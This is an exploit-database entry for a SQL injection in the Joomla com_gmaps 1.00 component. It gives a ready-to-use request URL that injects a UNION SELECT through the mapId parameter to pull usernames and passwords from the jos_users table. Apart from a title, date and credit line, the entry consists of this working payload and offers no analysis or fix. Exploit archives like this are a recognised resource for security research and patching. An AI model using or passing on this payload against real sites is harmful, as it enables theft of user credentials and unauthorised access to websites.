Joomla! Component com_gmaps 1.00 - 'mapId' SQL Injection

EDB-ID:

4248




Platform:

PHP

Date:

2007-07-31


joomla com_gmaps 1.00 Remote SQl Injection
 
Found: Cyber-Security
 
Exploit:
index.php?option=com_gmaps&task=viewmap&Itemid=57&mapId=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*

# milw0rm.com [2007-07-31]